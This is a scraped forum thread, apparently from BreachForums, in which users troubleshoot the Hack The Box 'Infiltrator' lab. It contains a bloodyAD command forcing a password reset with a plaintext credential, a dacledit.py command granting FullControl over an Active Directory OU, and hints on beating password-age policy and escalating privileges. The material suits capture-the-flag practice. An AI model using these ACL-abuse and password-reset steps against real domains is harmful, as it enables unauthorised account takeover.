Posts: 1
Threads: 0
Joined: Oct 2023
(Sep 01, 2024, 07:55 AM)teky Wrote: anyone knows why is this happening python
bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p 'WAT?watismypass!' set password "e.rodriguez" 'WAT?watismypass!'
Traceback (most recent call last):
File "/usr/bin/bloodyAD/bloodyAD.py", line 5, in <module>
main.main()
File "/usr/bin/bloodyAD/bloodyAD/main.py", line 144, in main
output = args.func(conn, **params)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/bin/bloodyAD/bloodyAD/cli_modules/set.py", line 86, in password
conn.ldap.bloodymodify(target, {"unicodePwd": op_list})
^^^^^^^^^
File "/usr/bin/bloodyAD/bloodyAD/network/config.py", line 80, in ldap
self._ldap = Ldap(self.conf)
^^^^^^^^^^^^^^^
File "/usr/bin/bloodyAD/bloodyAD/network/ldap.py", line 122, in __init__
raise e
File "/usr/bin/bloodyAD/bloodyAD/network/ldap.py", line 110, in __init__
raise err
File "/usr/lib/python3/dist-packages/msldap/client.py", line 120, in connect
raise err
File "/usr/lib/python3/dist-packages/msldap/connection.py", line 193, in connect
self.network = await asyncio.wait_for(client.connect(), timeout=self.target.timeout)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/asyncio/tasks.py", line 489, in wait_for
return fut.result()
^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/asysocks/unicomm/client.py", line 416, in connect
reader, writer = await asyncio.open_connection(self.target.get_ip_or_hostname(), self.target.port)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/asyncio/streams.py", line 48, in open_connection
transport, _ = await loop.create_connection(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/asyncio/base_events.py", line 1045, in create_connection
infos = await self._ensure_resolved(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/asyncio/base_events.py", line 1419, in _ensure_resolved
return await loop.getaddrinfo(host, port, family=family, type=type,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/asyncio/base_events.py", line 867, in getaddrinfo
return await self.run_in_executor(
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/concurrent/futures/thread.py", line 58, in run
result = self.fn(*self.args, **self.kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/socket.py", line 962, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
socket.gaierror: [Errno -2] Name or service not known
Dummy
dc01.infiltrator.htb or infiltrator.htb is not added to /etc/hosts
Also check for the ip is correct or not.
Posts: 26
Threads: 0
Joined: May 2024
(Sep 01, 2024, 06:45 AM)AncientNull Wrote: (Sep 01, 2024, 06:19 AM)x1rx Wrote: how did you pass password age poilcy error , I restarted many times but still getting same error
Password can't be changed before -2 days, 23:59:45.483637 because of the minimum password age policy.
I've tried resetting and speedrunning the harris password reset like 10 times. There's gotta be another way.
Did you bypass that bro? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 29
Threads: 1
Joined: Jan 2024
Sep 01, 2024, 08:18 AM
(This post was last modified: Sep 01, 2024, 08:18 AM by asdfmonster.)
hint for privesc from user? no find useful info yet
Posts: 22
Threads: 0
Joined: Jun 2024
(Sep 01, 2024, 08:18 AM)asdfmonster Wrote: hint for privesc from user? no find useful info yet bro how did you bypass that password age policy
Posts: 24
Threads: 1
Joined: Aug 2023
(Sep 01, 2024, 08:41 AM)mrranger2424 Wrote: (Sep 01, 2024, 08:18 AM)asdfmonster Wrote: hint for privesc from user? no find useful info yet bro how did you bypass that password age policy
Just change the policy again :
python dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb
Posts: 26
Threads: 0
Joined: May 2024
Sep 01, 2024, 09:09 AM
(This post was last modified: Sep 01, 2024, 09:09 AM by teky.)
(Sep 01, 2024, 08:51 AM)Kayiyan Wrote: (Sep 01, 2024, 08:41 AM)mrranger2424 Wrote: (Sep 01, 2024, 08:18 AM)asdfmonster Wrote: hint for privesc from user? no find useful info yet bro how did you bypass that password age policy
Just change the policy again :
python dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb Still the same
(Sep 01, 2024, 08:51 AM)Kayiyan Wrote: (Sep 01, 2024, 08:41 AM)mrranger2424 Wrote: (Sep 01, 2024, 08:18 AM)asdfmonster Wrote: hint for privesc from user? no find useful info yet bro how did you bypass that password age policy
Just change the policy again :
python dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb Still the same This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 24
Threads: 1
Joined: Aug 2023
(Sep 01, 2024, 09:09 AM)teky Wrote: (Sep 01, 2024, 08:51 AM)Kayiyan Wrote: (Sep 01, 2024, 08:41 AM)mrranger2424 Wrote: (Sep 01, 2024, 08:18 AM)asdfmonster Wrote: hint for privesc from user? no find useful info yet bro how did you bypass that password age policy
Just change the policy again :
python dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb Still the same
(Sep 01, 2024, 08:51 AM)Kayiyan Wrote: (Sep 01, 2024, 08:41 AM)mrranger2424 Wrote: (Sep 01, 2024, 08:18 AM)asdfmonster Wrote: hint for privesc from user? no find useful info yet bro how did you bypass that password age policy
Just change the policy again :
python dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb Still the same maybe waiting  ) because i sleep after that and test again , so this just about the time maybe
Posts: 49
Threads: 1
Joined: Jun 2024
(Sep 01, 2024, 09:09 AM)teky Wrote: (Sep 01, 2024, 08:51 AM)Kayiyan Wrote: (Sep 01, 2024, 08:41 AM)mrranger2424 Wrote: (Sep 01, 2024, 08:18 AM)asdfmonster Wrote: hint for privesc from user? no find useful info yet bro how did you bypass that password age policy
Just change the policy again :
python dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb Still the same
(Sep 01, 2024, 08:51 AM)Kayiyan Wrote: (Sep 01, 2024, 08:41 AM)mrranger2424 Wrote: (Sep 01, 2024, 08:18 AM)asdfmonster Wrote: hint for privesc from user? no find useful info yet bro how did you bypass that password age policy
Just change the policy again :
python dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb Still the same
dacledit and password change should be done very quickly. better to execute both the commands in a script.
Posts: 62
Threads: 18
Joined: Aug 2024
(Aug 31, 2024, 11:53 PM)spamdegratis5 Wrote: Output messenger server running in 14123, proxy to your host and access using k turner credentials found during foothold
I'm stuck in K.turner Output messenger. Any hints?
Posts: 8
Threads: 2
Joined: Jun 2024
i got user emails data in 20240901053946_users.json file of unzipped
|
